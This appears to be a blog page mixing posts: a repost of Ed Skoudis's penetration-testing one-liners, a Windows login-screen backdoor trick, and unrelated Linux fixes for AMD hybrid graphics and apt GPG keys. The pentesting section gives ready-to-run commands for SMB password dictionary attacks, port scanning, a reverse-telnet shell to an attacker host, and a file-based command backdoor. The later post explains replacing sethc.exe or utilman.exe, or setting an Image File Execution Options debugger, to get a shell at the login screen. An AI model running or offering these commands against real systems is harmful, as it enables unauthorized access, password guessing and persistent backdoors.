Pentesting ninjitsu - Ed Skoudis

http://www.jedge.com/wordpress/2008/12/penetration-testing-ninjitsu/

Great article, very nice commands:
---------------------------------------------------------------

Ping Sweep

C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”

Reverse DNS Lookup

C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack

C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Ninjitsu II

Linux Command-Line Port Scanner

$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”

$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client

C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer

C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell

C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing

C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista

C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista

C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0

C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings

C:\>net accounts /domain

Linux Ubuntu 12.04 - Ati / AMD discrete graphics

After searching "A LOT" on the web, forums, etc... i found a page that has a tip that works to change linux xserver to discrete graphics.

http://thealarmclocksixam.wordpress.com/2012/03/23/ubuntu-12-04-and-hybrid-graphics-on-sony-vaio-s/

I used this on my laptop HP dv6

Here are the steps;

1. edit /etc/modprobe.d/blacklist.conf

2. add these 2 lines to the end of the file 
# radeon
blacklist radeon

3. edit /etc/rc.local

modprobe radeon
chown -R $USER:$USER /sys/kernel/debug
echo OFF > /sys/kernel/debug/vgaswitcheroo/switch

4. reboot and it should be good

5. you can check if it worked

cat /sys/kernel/debug/vgaswitcheroo/switch

no more fan's noise, no more temperature...

Very nice hack

:D

--win 7 -- (still..) "good usage" for utilman.exe and sethc.exe

Physical access -> bootcd -> change .exe -> 0wned

If you have access to a Win 7 Box, you can still replace the binary c:\windows\system32\sethc.exe by cmd.exe (or meterpreter) and trigger it pressing 5 times the shift key on the login screen. 


This also works by replacing c:\windows\system32\utilman.exe, and pressing WINKEY-U in the login screen. (boot from CD to change the files)

....

You can also achieve same results by setting executable of your choice as Debugger to sethc.exe under Image File Execution options in registry. So in a priv command shell, it would be

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Same goes for Utilman.exe
....

apt-get gpg keys problem

W: GPG error: http://volatile.debian.org lenny/volatile Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY DFD993306D849617

Use the key id that is complaining

root@bt:/etc/apt# gpg --keyserver wwwkeys.eu.pgp.net --recv-keys DFD993306D849617
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
gpg: requesting key 6D849617 from hkp server wwwkeys.eu.pgp.net
gpgkeys: HTTP fetch error 6: Couldn't resolve host 'wwwkeys.eu.pgp.net'
gpg: no valid OpenPGP data found.
gpg: Total number processed: 0

root@bt:/etc/apt# gpg --keyserver wwwkeys.uk.pgp.net --recv-keys DFD993306D849617
gpg: requesting key 6D849617 from hkp server wwwkeys.uk.pgp.net
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 6D849617: public key "Debian-Volatile Archive Automatic Signing Key (5.0/lenny)" imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)
root@bt:/etc/apt# gpg --armor --export DFD993306D849617 | apt-key add -
OK